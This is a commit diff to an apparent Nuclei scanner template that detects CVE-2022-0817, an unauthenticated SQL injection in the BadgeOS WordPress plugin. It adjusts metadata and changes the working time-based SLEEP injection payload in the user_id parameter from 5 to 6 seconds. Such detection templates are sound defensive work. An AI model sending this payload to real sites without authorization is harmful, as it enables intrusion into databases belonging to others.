Update CVE-2022-0817.yaml

cves/2022/CVE-2022-0817.yaml

@@ -1,7 +1,7 @@
 id: CVE-2022-0817
 
 info:
-  name: BadgeOS < 3.7.1 - Unauthenticated SQLi
+  name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
   author: theamanrawat
   severity: critical
   description: |
@@ -11,13 +11,10 @@ info:
     - https://wordpress.org/plugins/badgeos/
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0817
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
     cve-id: CVE-2022-0817
-    cwe-id: CWE-89
   metadata:
-    verified: "true"
-  tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,badgeos,unauth
+    verified: true
+  tags: cve,cve2022,wordpress,wp-plugin,wp,badgeos,unauth,sqli
 
 requests:
   - raw:
@@ -27,13 +24,13 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=get-achievements&total_only=true&user_id=11+AND+(SELECT+9628+FROM+(SELECT(SLEEP(5)))WOrh)--+KUsb
+        action=get-achievements&total_only=true&user_id=11+AND+(SELECT+9628+FROM+(SELECT(SLEEP(6)))WOrh)--+KUsb
 
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=5'
+          - 'duration>=6'
           - 'status_code == 200'
           - 'contains(content_type, "application/json")'
-          - 'contains(body, "11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb")'
-        condition: and
+          - 'contains(body, "badgeos-arrange-buttons")'
+        condition: and